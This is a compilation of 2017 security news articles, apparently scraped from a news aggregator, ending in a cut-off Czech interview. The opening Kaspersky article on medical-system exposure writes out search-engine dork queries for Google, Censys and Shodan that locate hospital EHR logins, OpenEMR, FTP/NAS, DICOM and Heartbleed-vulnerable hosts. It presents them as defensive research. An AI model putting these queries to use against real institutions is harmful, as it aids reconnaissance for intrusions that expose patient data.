The Mistakes of Smart Medicine
6.4.2017 Kaspersky Safety
As numerous studies have shown, smart houses, smart cars, and smart cities are undeniably beneficial to people in everyday life, but quite often can become a threat to their safety. It is not only a matter of personal data leakage. Just imagine that, for example, a smart refrigerator, affected by a third party at one point or another, would begin identifying expired products as fresh. There is yet another more dismal scenario: the system of a smart car turns the vehicle to the right at high speed, catching the driver unaware…

However, both existing and predictable threats that emerge from home IoT devices are only part of the problem related to the infrastructure around us becoming “smarter”. A technological boom in medicine both encouraged medical institutions to use exclusively information systems in processing data and led to the emergence of new types of technological equipment and personal devices that can be used to interact with traditional systems and networks. This means that the threats that are relevant for them can also be relevant for medical systems.

Entry Points for Accessing Valuable Data

For the medical industry, the main attack vector is related to personal data and information on the health condition of patients. The first step in evaluating the security level for data is identifying entry points within the infrastructure of medical institutions where healthcare data can be collected, stored, and/or taken advantage of by an evildoer.

Possible entry points can be classified as follows:

information systems on the computer network of a medical institution (servers, workstations, admin panels for medical equipment, etc.) that access the Internet;
medical equipment that is connected to an enterprise network;
medical equipment that is not a network node but connects to a workstation (for example, via USB);
portable devices of patients (advanced fitness trackers, pacemakers and cardiac monitors, insulin pumps, etc.) and mobile devices that can track health indicators (mobile smartphones and smart watches);
other wireless information systems (Wi-Fi, Bluetooth, or RF), which can be mobile ECG devices, pulse oximeters, event monitors for tracking the medical condition of high-risk patients, and so on.
For the last three classes mentioned above, a detailed first-hand analysis of specific models related to these classes is required. It is for exactly this reason that those devices deserve an article of their own. For now, we will focus on devices and their components that do not require physical access and are frequently accessible from the Internet.

Portable Devices May Port Medical Histories

We’ve already written the following about the security of portable devices in March of 2015: “Just imagine, if a fitness tracker with a heart-rate monitor is hacked, then any shop owner will be able to track the heart rate of buyers as they look at discounts in the shop. The influence of advertisements on people can be learned in the same manner. Moreover, a hacked fitness tracker with a heart-rate monitor can be used as a lie detector.”

Owing to the increasing accuracy of sensors, gadgets that collect data on the health condition of their owners can potentially be used in serious ambulatory care to assess a patient’s health. However, the level of security for these gadgets has not been developing as fast as their capabilities.
 

Tracking vital signs with the help of mobile devices may become an integral part of ambulatory care in the nearest future

Information that is collected by tracking vital signs can be used by both the owner of the device and the vendor of the infrastructure that the tracking app operates on. For users, the heart-rate parameter can signify that a certain activity should be decreased, specific medicines should be taken, etc., while vendors can send collected data to medical companies that can use it to assess the overall health of the client.

Thus, the main advantage of data collected by a gadget is not the depth of its analysis (any medical examination will yield more accurate results than readings from a fitness tracker) but the ability to evaluate changes in a patient’s health condition dynamically. Scenarios for using the information are limited by the imagination and enterprise of the owner, as well as by laws related to personal data.

If we look at the same piece of information from the perspective of a cybercriminal, then an owner of such a device will have not the most favorable outlook – analysis of certain parameters (for example, heart rate, sleep quality, or average ADL score) allows a criminal to gain an overview of a victim’s health. Any additional information may be provided by a gadget that is connected to the mobile device and is capable, for instance, of measuring the blood pressure or blood sugar levels of its user. After making conclusions about the ailments of a victim, an evildoer can provoke their aggravation.

Attacks to obtain health data can be divided into three basic types: those that violate data privacy, those that compromise data integrity, and those that attack data availability. Main vectors can be defined for each of those.

Types of attack that violate the privacy of medical data:

man-in-the-middle attacks on a sensor channel between the sensor and the service that stores the sensor’s data;
unauthorized access to local and remote data storage.
Types of attacks on data integrity:

unauthorized access to data storage with possible data substitution;
man-in-the-middle spoofing attacks on channels in order to substitute transmitted data;
modification (substitution) of data (spoofing attacks) and their transmission to consumers (as a service that stores data or an app).
Attacks on availability:

ransomware attacks (encryption/deletion of user data).
Entry points for malicious code that commits theft or substitutes data on a mobile device depend on a specific combination of device and software.

Online Medical Data

Yet, I would like to review another entry point in detail – information systems on a medical institution’s network that are accessible from the Internet.

Medical institutions utilize automated healthcare data storage solutions, which store miscellaneous information about patients (diagnosis results, information about prescribed drugs, medical histories, etc.). The infrastructure of such a system may include various hardware and software components, which can be merged into data storage networks and can be accessible from the Internet in one form or another.

Regarding solutions for storage of healthcare data, several software packages, which can be exploited as entry points into medical infrastructure, can be given as examples.

Hospital information systems (HISs) are software packages that control medical information coming from various sources, including the systems mentioned below.
Electronic Health Records (EHR) systems are dedicated software that enable storage of structured patient data and documentation of patient medical history.
Network-attached storage (NAS) refers to dedicated network storage devices, which can be both specialized devices for storing healthcare data or enterprise devices employed in the medical-institution
DICOM-complaint (Digital Imaging and Communications in Medicine) devices and PACS (picture archiving and communication system) servers are medical information systems based on the DICOM standard and include the following components:
a DICOM client, which is a medical device that is capable of transmitting data to a DICOM server;
a DICOM server, which is a hardware and software package that provides for the receipt and storage of data from clients (in particular, these devices can be PACS servers);
a DICOM diagnostic workstation and DICOM printers, both of which are hardware and software packages that are responsible for processing, visualizing, and printing medical images.
A key feature of the above-mentioned systems is a web interface (a web app) that is used to control them over the Internet. A web interface may have vulnerabilities that can be exploited by an evildoer, who can gain access to valuable information and processes. It is worth reviewing these systems in detail and verifying whether they are accessible from the Internet, i.e. if they are a potential entry point for evildoers.

Electronic Health Records (EHR)

In order to evaluate the number of apps that are available from the outside (from the Internet) and can work with EHR, a list of software employed in these tasks should be created and then a dork list should be organized. Dorks are special search-engine queries that are aimed at finding web components of required software among all of the resources indexed by a search engine.

Here is an example of a dork query that uses Google to search for the login form of EHR software components:

intitle:”<vendor_name> Login” & inurl:<vendor name>
 

The example of a discovered web component (a login form) of software that is intended to work with EHR

It should be noted that some of the resources found in the search results turned out to be traps for evildoers (honeypots). This fact alone indicates that analysts are seeking to track threats related to medical infrastructure. To check if an identified resource is a honeypot, an IP address should be submitted to a special service, HoneyScore, which, by scanning a number of the resource’s attributes (for example, the hosting provider), reaches a verdict on whether or not the resource is a honeypot. Nevertheless, a significant part of the discovered resources is represented by actual systems.
 

126 discovered resources that meet the search criteria

Each of the discovered web resources is a potential entry point that can be exploited by an evildoer to access the infrastructure. For example, many discovered systems lack protection against an exhaustive password search, which means that a criminal can use brute-force attacks. Then, by using a hacked account, the evildoer can gain privileged access to the system through the interface or find or exploit online vulnerabilities in order to access the system in the future.
 

An example of a discovered web interface for logging into an EHR system

Hospital Information Systems (HISs)

A “hospital information system” is quite a vast notion that includes a set of methods and technologies for processing medical information. In our case, we are interested only in the HIS components that have a web interface for controlling and visualizing medical information.

Let’s consider the software of OpenEMR as an example. This software is used in medical institutions as a medical-data management solution, and it is certified by the Office of the National Coordinator for Health Information Technology (ONC). Some of its components are written in the PHP programming language, which means that a potential entry point for an evildoer can be a web server that maintains these OpenEMR components.

The next Google dork query returned 106 search results that meet the following criterion:

inurl:”/interface/login/login_frame.php” intitle:”Login” intext:”Username:”

After a quick analysis of the search results, it became obvious that components of the majority of the discovered OpenEMR systems have vulnerabilities, including some critical ones. This means that these vulnerabilities open up the OpenEMR database to being compromised. This comes with the fact that exploits for the discovered vulnerabilities are publicly available.
 

An example of a vulnerable HIS that was openly exposed

For example, analyzing different software versions revealed that information had been published on the vulnerabilities for the vast majority of software installed on the hosts.

OpenEMR version Number of hosts (%) Availability of public exploits
4.2.0 31,4 Yes
4.1.2 14,3 Yes
4.1.0 11,4 Yes
4.2.1 5,7 No
4.0.0 5,7 Yes
4.1.1 2,8 Yes
4.3.1-dev 2,8 No
2.8.3 2,8 Yes
3.2.0 2,8 Yes
Proprietary (modified) version 8,5 –
Unknown version 11,4 –
Network Attached Storage (NAS)

There are at least two types of NAS servers that have been used by medical institutions: dedicated “medical” NAS servers and common ones. While the former have strict security requirements for the data stored on them (for example, compliance with the Health Insurance Portability and Accountability Act), the security of the latter rests on the conscience of their developers and the medical institutions that use this type of NAS in their infrastructure. As a result, non-medical NAS may be left working without any updates for years and thus gather a great number of known vulnerabilities.

A list of dorks should be created to select NAS devices located in medical institutions out of all of the other devices indexed by search engines.

The next query is for the Censys search engine, which specializes in indexing devices with IP addresses and finds all of the devices (workstations, servers, routers, NAS servers, etc.) that belong to companies whose names contain words that directly or indirectly define these companies as medical institutions (“healthcare”, “clinic”, “hospital”, and “medical”):

autonomous_system.organization: (hospital or clinic or medical or healthcare)
 

The Censys search engine found approximately 21,278 hosts that are related to medical institutions

The Censys report, which is shown below, lists the top 10 countries where these hosts are located.

Country Hosts
United States 18 926
Canada 1113
Iran 441
Saudi Arabia 379
Republic of Korea 135
Australia 81
Thailand 33
United Kingdom 32
Puerto Rico 28
Vietnam 27
Afterward, only those hosts that are FTP servers can be taken out from the search results that contain the hosts. In order to do this, the query in the search engine should be more specific and, for example, only the hosts that contain an open FTP port and whose banners contain the “FTP” line should be searched for (this is the information that a server sends to a client during attempts to connect to its port):

(tags: ftp) and autonomous_system.organization: (health or clinic or medical or healthcare)

The search results displayed 1,094 hosts with operational FTP servers, which presumably belong to medical institutions.
 

Additionally, a list of vendor-specific NAS devices can be obtained from the narrowed-down search results. For this, the typical characteristics of a device must be known. These may be included in responses from services that are active on the device (for example, an FTP-server response to a connection attempt may contain the name of the device and its firmware version). The next query allows for selection of only those hosts that contain the “NAS” line in their banner (generally, several QNAP Systems models have this property) from all found hosts:

(metadata.description: nas) and autonomous_system.organization: (health or clinic or medical or healthcare)
 

The discovered QNAP Systems NAS servers that belong to medical organizations

A ProFTPd web-server release that has vulnerabilities was installed on each of the found NAS. For this release, there is also publicly available and easily accessible information about its exploits.
 

PACS Servers and DICOM Devices

The most common type of devices that utilize the DICOM format are PACS servers that print patient images that have been received from other DICOM devices.

It is possible to enter the following primitive query in the Shodan search engine to start searching for DICOM devices:

DICOM port:104

Accordingly, the search results will display hosts (mostly workstations and servers) that are used in medical institutions for storing and processing patient DICOM images.
 

The list of hosts that are used to process/store DICOM images

Also, it might be worth searching for diagnostic DICOM workstations, which are dedicated PACS systems used for processing, diagnosing, and visualizing data. As an example, the following query for the Censys search engine can be used:

pacs and autonomous_system.organization: (hospital or clinic or medical or healthcare)

Analysis of the search results may reveal dedicated software for a diagnostic workstation.

 

The login forms of diagnostic workstations used for visualization of patient data

Aside from that, there are also admin panels used to access DICOM servers in the search results.
 

A login form for accessing a DICOM server

Non-medical Systems with “Pathologies”

The systems described above handle valuable medical data. Therefore, security requirements for those systems must be high. However, let’s not forget that besides potential entry points, there are dozens of other points an evildoer can use that are not directly related to medical systems but are located in the infrastructure along with valuable data.

Here are several examples of non-medical systems that can be used as a potential entry point into a computer network with the goal of subsequently moving on to resources where medical information is stored:

any servers (web servers, FTP servers, e-mail servers, etc.) that are connected to the network of an institution and are accessible from the Internet;
a medical institution’s public Wi-Fi hotspots;
office printers;
video surveillance systems;
SCADA controllers;
automated systems for controlling mechanical and electrical components of a building (building management systems, BMS).
Each of the mentioned systems may have a vulnerability that can be taken advantage of by an evildoer in order to gain access to medical infrastructure.

For example, the popularity of the Heartbleed vulnerability can be evaluated. This requires entering the following query into the Censys search engine:

autonomous_system.organization: (hospital or clinic or medical or healthcare) and 443.https.heartbleed.heartbleed_vulnerable: 1

The search engine showed 66 hosts that met the criteria and were potentially vulnerable to Heartbleed. Additionally, this was after the existence of the vulnerability, and its dangers had been given wide coverage by the mass media. Generally speaking, when referring to Heartbleed, it should be noted that the problem is global in nature. According to a report by the founder of Shodan, approximately 200,000 websites still remain vulnerable.

Stay Healthy

In order keep evildoers from stealing medical data from institutions, we, along with taking essential security measures typical for enterprise infrastructure, recommend doing the following:

exclude from external access all of the information systems that process medical data or any other patient-related data;
all of the medical equipment that connects to a workstation (or is a network node) should be isolated in a dedicated segment, while the operational parameters of the equipment can be modified by using the workstation (or remotely);
any online information systems should be isolated in a “demilitarized” zone or completely excluded from an enterprise network;
continuously monitor medical-system software for updates and update software regularly;
change default passwords that are set up for the login forms of medical systems and delete unwanted accounts from the database (for example, test accounts);
create strong passwords for all accounts.


Scottrade Bank admits a data breach that potentially exposed 20,000 customers’ records
6.4.2017 securityaffairs CyberCrime

Scottrade Bank confirmed that a technical incident has exposed 20,000 customer records. a 60GB MSSQL database was accidentally left open online.
It is official, the Scottrade Bank suffered a data breach that affected thousands of its customers.

Online brokerage Scottrade has admitted the data breach for sensitive loan applications from roughly 20,000 customers.

Scottrade

The incident occurred when IT services company Genpact uploaded the sensitive data to an Amazon-hosted server. Unfortunately, the company didn’t protect the precious archive leaving it exposed online without protection.

The incident was discovered by the popular security expert Chris Vickery, who was well known to have discovered many other databases left online without protection. Vickery discovered the precious archive and downloaded the 158.9GB Microsoft SQL database, then he decided to report the issue to Scottrade.

According to Vickery the archive contains account passwords in plain text, the exposed records include names, addresses and social security numbers.

Follow
Chris Vickery @VickerySec
Large MSSQL db fully loaded. It's as bad as I expected. Bank-related. Plaintext passwords. Big name company. I've reached out to them.
12:38 AM - 2 Apr 2017
28 28 Retweets 26 26 likes
Scottrade promptly started an investigation and discovered the root cause of the incident. A Genpact employee hasn’t properly configured the SQL server.

“On April 2, Genpact, a third party vendor, confirmed that it had uploaded a data set to one of its cloud servers that did not have all security protocols in place. As a result, the data was not fully secured for a period of time. The file contained commercial loan application information of a small B2B unit within Scottrade Bank, including non-public information of as many as 20,000 individuals and businesses.” reads the official statement issued by Scottrade. “Upon being alerted to the issue, Genpact immediately secured that information, and traced the issue to a configuration error on their part while uploading the file.”

The precious archive has now been immediately removed from online after the breach notification.

The service provider Genpact is investigating the incident to determine which data have been exposed.

“Genpact is undertaking an extensive analysis of the log files and the environment to determine to what extent the data may have been accessed. It has engaged a leading forensics firm to assist in the analysis.” continues the statement.

Genpact and Scottrade confirmed that the incident wasn’t caused by a cyber attack against the internal servers of both companies.

Scottrade has already suffered a data breach in the past, in October 2015 an incident exposed the personal information of 4.6 million customers.


Apache Struts Flaw Used to Deliver Cerber Ransomware

6.4.2017 securityweek Virus
A recently patched Apache Struts 2 vulnerability has been exploited by cybercriminals to deliver Cerber ransomware to Windows systems, researchers warned.

The flaw, tracked as CVE-2017-5638, can be exploited for remote code execution. Malicious actors started exploiting the vulnerability to deliver malware shortly after a patch was made available and a proof-of-concept (PoC) exploit was released.

In many cases, attackers targeted Unix systems with backdoors and distributed denial-of-service (DDoS) bots, but recently experts also spotted a campaign targeting Windows machines.

In the week of March 20, researchers at F5 Networks started seeing attacks delivering Cerber ransomware to Windows servers. Experts at the SANS Technology Institute also reported seeing these attacks on Wednesday.

Cybercriminals have used the exploit to execute shell commands and run BITSAdmin and other command-line tools shipped with Windows. These tools are used to download and execute the Cerber malware.

The ransomware encrypts important files found on the system and demands money in return for the “special decryption software” needed to recover the files.

The Bitcoin address where victims are instructed to send the ransom is the same across multiple campaigns. F5 Networks reported seeing 84 bitcoins, currently worth nearly $100,000, in that address.

“The new vulnerability in Apache STRUTS provides a target-rich environment for threat actors to extend their business while infecting thousands of new servers,” F5 said in a blog post. “Targeting servers, rather than individuals, with ransomware has better chances for monetization because those are usually run by organizations with deeper pockets and better infrastructure that might be critical for their business.”

AT&T vulnerable to Apache Struts exploit

The Apache Struts vulnerability has been found to affect many products, including from Cisco and VMware.

Independent security researcher Corben Douglas reported on Wednesday that he tested AT&T systems roughly 4-5 days after the exploit was released and they had been vulnerable to attacks. The expert said he managed to execute commands on AT&T servers, which could have allowed him to “pwn” the company.


Mozilla Wants 64 Bits of Entropy in Certificate Serial Numbers

6.4.2017 securityweek Security
Mozilla this week announced an update to its CA Certificate Policy, which now requires the use of 64 bits of entropy in certificate serial numbers.

The change was included in Mozilla’s CA Certificate Policy 2.4.1, and arrives nearly one year after the CA/Browser Forum adopted Ballot 164, which required Certificate Authorities to use greater randomization when issuing certificates, to mitigate collision attacks and make preimage attacks more difficult.

The ballot also proposed replacing entropy with cryptographically secure pseudo-random number generator (CSPRNG). Thus, Section 7.1 of the Baseline Requirements was modified to “Effective September 30, 2016, CAs SHALL generate Certificate serial numbers greater than zero (0) containing at least 64 bits of output from a CSPRNG.”

The change was proposed after it was demonstrated that hash collisions can allow attackers to forge a signature on the certificate of their choosing and that random bits made the security level of a hash function twice as powerful. While adding random bits was encouraged before, the ballot made it a requirement.

The updated CA Certificate Policy also states that CP and CPS documents now need to be submitted to Mozilla each year, in addition to audit statements, and that these documents need to be provided in English starting June 1, 2017. The company also updated the applicable versions of some audit criteria.

Mozilla also notes that submitted documentation must be openly licensed and that the Common CCADB Policy and the Mozilla CCADB Policy are incorporated by reference in Mozilla’s CA Certificate Policy version. Further, the new Common CA Database (CCADB) Policy makes official a number of existing expectations regarding the CCADB, and there are additional requirements on OCSP responses, the company says.

The organization has already sent the CA Communication to the Primary Point of Contact (POC) for each CA and asked them to respond to 14 action items. Additionally, there are discussions in the mozilla.dev.security.policy forum about upcoming changes, questions and clarification about policy and expectations, root certificate inclusion/change requests, that CAs are invited to contribute to.

“With this CA Communication, we re-iterate that participation in Mozilla’s CA Certificate Program is at our sole discretion, and we will take whatever steps are necessary to keep our users safe. Nevertheless, we believe that the best approach to safeguard that security is to work with CAs as partners, to foster open and frank communication, and to be diligent in looking for ways to improve,” the company said.


"Philadelphia" Ransomware Targets Healthcare Industry

6.4.2017 securityweek Virus
A newly observed ransomware family is being used in attacks against organizations in the healthcare industry, Forcepoint security researchers reveal.

Dubbed Philadelphia, the malware is a variant of the Stampado malware that emerged last year as one of the cheapest ransomware families available for would-be cybercriminals. It was being offered at only $39 for a lifetime license, much less than what other threats sold via the ransomware-as-a-service (RaaS) business model cost. An ad for Philadelphia was spotted last month on YouTube.

The Philadelphia ransomware, Forcepoint says, appears to be distributed via spear-phishing emails that contain a shortened URL, and has been already used to infect a hospital from Oregon and Southwest Washington. The link redirects to a personal storage site that serves a malicious DOCX file containing the targeted healthcare organization's logo to give it an increased sense of legitimacy.

The file includes three document icons allegedly pertaining to patient information, and the intended victim is encouraged to click on any of them. However, once that happens, a malicious JavaScript is triggered to download and execute the Philadelphia ransomware.

After installation, the malware communicates to its command and control (C&C) server to check in. It sends various details on the infected system, including operating system, username, country, and system language, and the C&C responds with a generated victim ID, a Bitcoin wallet ID, and the Bitcoin ransom price.

Next, the malware starts encrypting user files using AES-256 encryption. Once the process has been completed, the ransomware displays a window informing users that their files have been encrypted and urging them to pay 0.3 Bitcoins to a specific address.

According to Forcepoint, not only did the cybercriminals use a tailored bait targeting a specific healthcare organization in their attack, but the encrypted JavaScript they used contained the string “hospitalspam” in its directory path. Moreover, the C&C server also contained “hospital/spam” in its path.

This would suggest that the actor is specifically targeting hospitals using spear phishing emails for distribution, the researchers say. The campaign supposedly started in the third week of March.

“Individually, this may not be a great deal of an attack towards the Healthcare sector. However, this may signify the start of a trend wherein smaller ransomware operators empowered by RaaS platforms will start aiming for this industry, ultimately leading to even bigger and diversified ransomware attacks against the Healthcare sector,” Forcepoint concludes.


PLCs From Several Vendors Vulnerable to Replay Attacks

6.4.2017 securityweek ICS
Programmable logic controllers (PLCs) from several major vendors are affected by implementation flaws that can be exploited by attackers to execute arbitrary commands on the vulnerable devices, researchers warned.

The vulnerabilities, identified by ICS security firm CRITIFENCE, are related to the Modbus communications protocol, which is often used for connecting industrial devices. The company has been criticized for leading people to believe that ransomware attacks leveraging the flaws had already been spotted in the wild.

According to CRITIFENCE, devices from several companies are vulnerable to attacks, including Schneider Electric, GE and Rockwell Automation’s Allen-Bradley.

For the time being, only Schneider addressed the problem and the advisory published by the security firm focuses on Schneider products. ICS-CERT and other affected vendors have been notified.

In the case of Schneider, the vulnerabilities affect Modicon PLCs. The company has not released any firmware updates, but pointed out that some of its products already include protection mechanisms for these types of attacks, and provided mitigation advice for devices that don’t have any built-in protections.

CRITIFENCE said in its advisory that attacks are possible against Schneider PLCs due to two vulnerabilities: CVE-2017-6034 and CVE-2017-6032. An attacker who has access to the OT network can intercept traffic going to the targeted PLC, including the session identifier needed to send administrative commands to the device.

Once they obtain the session key, which is transmitted in clear text, attackers can replay the request and add arbitrary commands, including for starting and stopping the PLC, and downloading its ladder diagram.

CRITIFENCE has published a proof-of-concept (PoC) exploit showing how a remote attacker can execute arbitrary commands on a Schneider PLC. The company believes these types of flaws can be exploited in ransomware-style attacks where hackers threaten to wipe ladder diagrams from PLCs unless their demands are met.

This attack scenario, dubbed “ClearEnergy” by CRITIFENCE, has drawn criticism from some ICS security experts. CRITIFENCE initially led to believe that ClearEnergy attacks were actually spotted in the wild with a news article named “ClearEnergy ransomware aim to destroy process automation logics in critical infrastructure, SCADA and industrial control systems.” The company later clarified that it was only a PoC ransomware attack.


Microsoft Details Data Collection in Windows 10 Creators Update

6.4.2017 securityweek Privacy
Microsoft on Wednesday revealed details on the data collection practices that the next major Windows 10 version, set to arrive next week, will be collecting from computers.

Ever since first announcing Windows 10, the tech giant faced criticism for collecting a large amount of data on the usage of the platform and applications. In July 2016, France served notice to Microsoft to stop collecting excessive user data without consent on civil liberty grounds.

In September 2015, the company said that the collected data was meant to improve the overall user experience. Only months before, the company had boosted data collection in Windows 7 and Windows 8.

In January this year, the company took the wraps off a privacy dashboard, meant to provide users with increased visibility and control over the data collected by Microsoft services, and even allows them to clear the collected data if they want to.

At the time, Microsoft also revealed that Windows 10 Creators Update will simplify Diagnostic data levels, reduce data collected at the Basic level, and present only two data collection options to users: Basic and Full. The platform update will also bring increased privacy settings, Microsoft said in early March.

Only one week before Windows 10 Creators Update starts rolling out to users, Microsoft decided to provide specific information on the type of data it will be gathering from users’ computers based on the collection level selected.

“The Basic level gathers a limited set of information that is critical for understanding the device and its configuration including: basic device information, quality-related information, app compatibility, and Windows Store,” Microsoft’s Brian Lich explains.

Security level information is also collected as part of the Basic level, with all of the gathered information meant to help identify problems that can occur on a particular device hardware or software configuration.

When it comes to the Full level, the type of collected data expands dramatically beyond the data gathered in the Basic level, to include device, connectivity, and configuration data; products and services usage data; software setup and inventory data; browsing, search and query data; typing and speech data; and licensing and purchase data.

Thus, users who opt in for this data collection level will allow their Windows 10 machine to send information such as OS version, user ID, Xbox user ID, device ID, device properties and capabilities, app usage, device health and crash data, device performance and reliability data, device preferences and network info, installed applications, content consumption data, and information on purchases made on the device.

Facing increased scrutiny over its data collection practices, Microsoft appears determined to become more transparent on the matter, so as to ensure it doesn’t run into too much trouble, especially in the European Union, which last year started investigating the tech giant on user privacy-related issues. For that, the company also published a privacy statement.


Operation Cloud Hopper: China-based Hackers Target Managed Service Providers

6.4.2017 securityweek CyberCrime
Operation Cloud Hopper Targets Managed IT Service Providers and Their Clients

A widespread campaign known to be targeting managed service providers (MSPs) in at least fourteen countries has been tied to the group known as APT10 and is thought to be operating out of China. These are the conclusions of a new report published this week by PwC UK and BAE Systems.

As always with such reports, attribution is down to the weight of circumstantial evidence. The authors detail historical evidence that leads towards APT10, and domain registration timing evidence that suggests operation from within China's timezone. The authors do not suggest that APT10 is state-controlled, but they paint a picture that invites a conclusion that it is at least state-sponsored.

Part of the historical evidence includes an overlap in malware used in attacks previously attributed to APT10. The group is believed to have primarily used Poison Ivy before switching to PlugX; and used both for a period of about nine months. From around mid-2016 it started to 're-tool' and is now using PlugX, ChChes, Quasar and RedLeaves.

There are two big takeaways from this report (PDF): the reality that organizations are still not adequately securing their supply chain; and the potential that the US/China and UK/China agreements to curb economic espionage are now defunct.

The authors describe a campaign that uses well-researched spear-phishing to first compromise MSPs. From here they obtain legitimate credentials to access the MSPs' client networks that align to APT10's targeting profile -- which the authors claim aligns with China's current five-year plan (FYP) for economic growth.

Once on the target network, the attacker moves laterally to locate specific data of interest. This is collected and compressed before being moved back to the MSP and finally sent to a server under the attackers' control. This is a classic supply-chain attack, similar in concept to the iconic Target breach. Organizations are generally getting better at their own security but remain slack over the security of their suppliers -- in this case, their MSPs.

"It is fundamental for organizations to come to terms with the fact that raising their own security posture is essential but not sufficient," warns Donato Capitella, senior security consultant at MWR InfoSecurity; "especially if they are then willing to interweave their IT systems with third parties whose security posture is insufficient. Organizations have to mandate higher security standards if they do not want to see all of their security investment undermined by trivial security mistakes on behalf of their partners. At the same time, third parties that can demonstrably step up their security game will become preferred over time and will undoubtedly have a higher chance to win important contacts in the future.?"

The question over whether the US and UK accords with China over economic espionage is now defunct is posed, but not answered by the study. The US and UK are only two of fourteen countries affected, so they are not specifically targeted. It is MSPs in all of those countries that are the targets; and we are not told of any specific client organizations breached.

The two accords specify 'economic espionage'; political espionage is still acceptable in both directions. It is perfectly possible, if not likely, that MSPs compromised in America and Britain have not been used for economic gain. Without further information from the authors, we simply do not know.

It is likely that the attackers are the group known as APT10, and it is likely that they are based in China -- but unambiguous attribution and motivation is not possible based on this report. "Overall," comments Israel Barak, CISO of Cybereason, "the notion that China has decreased its efforts since 2015 to conduct economic espionage is preposterous. China is known for using cutouts and sympathetic agents to collect information on their behalf. China, Russia and other nation states frequently outsource wholesale hacking operations to individual groups and companies. In addition to their government services, these companies contract with, and provide services to, other clients. To do otherwise would greatly devalue the plausible deniability that is one of the major benefits of outsourcing. There are many reasons there is an uptick in outsourcing of operations because countries can rapidly expand capabilities in a short period of time, increase plausible deniability of actions, mitigate risk of detection, gain technical expertise that they cannot recruit directly into the government and decrease overall operational costs."

But whether this indicates the end of the two China accords is a different matter. "The most significant challenge for investigators in the UK or US is tying digital activity to a person and organization in this massive breach or any breach for that matter. In reality, we live in a world where as more and more state-sponsored activity is being conducted by corporations, attribution gets even more difficult. To reiterate, it is too early in this particular instance to determine whether the Cameron-Xi accord was broken or is it simply a case of competitive intelligence and cybercrime that must be dealt with bilaterally between Great Britain and China."


Národní bezpečnostní úřad posílí dvacet expertů kvůli obraně před kyberútoky

6.4.2017 Novinky/Bezpečnost Kyber
Národní bezpečnostní úřad (NBÚ) v blízké době posílí dvacet expertů kvůli ochraně státních úřadů před kybernetickými útoky. Počítá s tím návrh premiéra Bohuslava Sobotky (ČSSD), který ve středu schválila vláda. Noví zaměstnanci by měli dávat úřadům metodické pokyny, pomáhat s prevencí a konzultovat s nimi problémy.
Úřady, a to i ty, které nespadají pod zákon o kybernetické bezpečnosti, by mohly NBÚ požádat o analýzu zabezpečení svých systémů, návrhy zlepšení či speciální školení. "Odborníci vytvoří týmy poskytující komplexní metodickou podporu konkrétním subjektům, které o ni požádají, což je nový úkol, který vláda úřadu uložila," uvedl Sobotka.

Na nově vytvořená místa by měli přijít specialisté na operační systémy, počítačové sítě, aplikace a mobilní komunikaci, odborní auditoři či pracovníci zaměření na právní úpravu kybernetické bezpečnosti.

Při plánovaném dělení NBÚ by měli noví zaměstnanci přejít do Národního úřadu pro kybernetickou a informační bezpečnost. Nový úřad bude zakládat vládní zmocněnec pro tuto oblast Dušan Navrátil. Legislativní základ úřadu by měl položit pozměňovací návrh k novele o kybernetické bezpečnosti, o které budou poslanci hlasovat na dubnové schůzi.

Kybernetické centrum má Česko chránit před hackerskými útoky a dalšími bezpečnostními hrozbami. Vyroste v části původních kasáren v Brně - Černých Polích. V budoucnu by mělo zaměstnat 400 lidí. Kybernetické útoky na kritickou či důležitou informační infrastrukturu jsou v posledních letech na vzestupu. Vládní tým GovCERT eviduje zhruba 100 bezpečnostních incidentů měsíčně.

Kabinet ve středu také vyslechl zprávu o stavu kybernetické bezpečnosti Česka za loňský rok, informoval Sobotka.


Lior Tabansky: V kyberprostoru umí nejlépe útočit Rusko a Izrael
6.4.2017 Lupa.cz Kyber

Izraelský odborník na kybernetickou bezpečnost mluví o budoucnosti útoků a vývoji v jeho zemi.
Lior Tabansky působil v elitní technické jednotce izraelského letectva a léta se v rámci různých akademických, soukromých i vládních aktivit soustředí na kybernetickou bezpečnost. Působí na univerzitě v Tel Avivu a vydal knihu Cybersecurity in Israel. V rozhovoru pro Lupu mluví i o schopnosti zemí aktivně útočit v kyberprostoru a jak se připravovat na budoucnost.

Izrael je jedna z největších světových velmocí v kybernetické bezpečnosti. V Česku si to osobě často také myslíme. Myslíme si to správně?
Není zde důvod, aby Česká republika nebyla jedním ze světových lídrů. Úspěch Izraele je výsledkem mnoha let investic do výzkumu a vývoje, akademického prostředí, aplikovaného výzkumu, vojenského výzkumu. Všechno toto vytvořilo ekosystém, znalosti lidí a instituce, což rychle a efektivně produkuje inovace. Pro zemi, která má stejnou a vysokou úroveň ekonomického vývoje, není důvod, proč by nezměnila svá interní pravidla a nezvýšila svoji konkurenceschopnost a inovace.

Můžete mi dát příklady některých zajímavých kyberbezpečnostních firem z Česka, o kterých víte?
Ani ne. Nedělám si průzkumy trhu, zajímám se o pravidla a politiku nad tím.

Z Českem tedy přicházíte do styku jak?
Máme produktivní spolupráci v oblasti kybernetických pravidel a politik. Obě země dobře spolupracují a mají v této oblasti společné zájmy.

Lior Tabansky
Autor: Jan Sedlák
Lior Tabansky
Jak lze v kybernetické bezpečnosti spolupracovat? Například NATO samo tvrdí, že v této oblasti je v podstatě každá země sama.
Ano, když přijde útok, jste v tom sami. Mluvím o kooperaci ne v rámci útoků, i když i ta zde může být, ale v oblasti budování pravidel. V tomto ohledu probíhá řada aktivit. Česká ambasáda v Izraeli má dokonce svého atašé na kybernetickou bezpečnost. Jsou zde i spolupráce mezi soukromými firmami a vládami.

V současné době se běžně provádějí kybernetické zásahy mezi zeměmi, vedou se jakési hybridní války a podobně. Myslíte, že takovéto aktivity vedou k tomu, že se hned nemusí vést ozbrojené konflikty?
Když dnes chcete dosáhnout něčeho vůči zemím, které mají dobrou obranu, typicky tedy západní země, nemá smysl jít proti jejich silným stránkám a používat třeba tanky. Je lepší najít alternativní strategie. To ostatně ukazuje historie válčení. Oblast tedy bude do budoucna sílit a využívat momenty překvapení.

Které země umí tyto kybernetické zásahy nejlépe?
To je těžké měřit. Jedna věc je to, jaké má daná země schopnosti či vybavení, a druhou věcí je pak to, co s tím skutečně dosáhne, jaké má výsledky. V kombinaci těchto zemí jsou na tom nejlépe Rusko a Izrael. Potenciál pro mnoho dalších zemí je každopádně veliký. Mohou velice rychle vyvinout kapacity i potřebné strategie.

Měly by tedy země mít schopnosti aktivního kyberútočení?
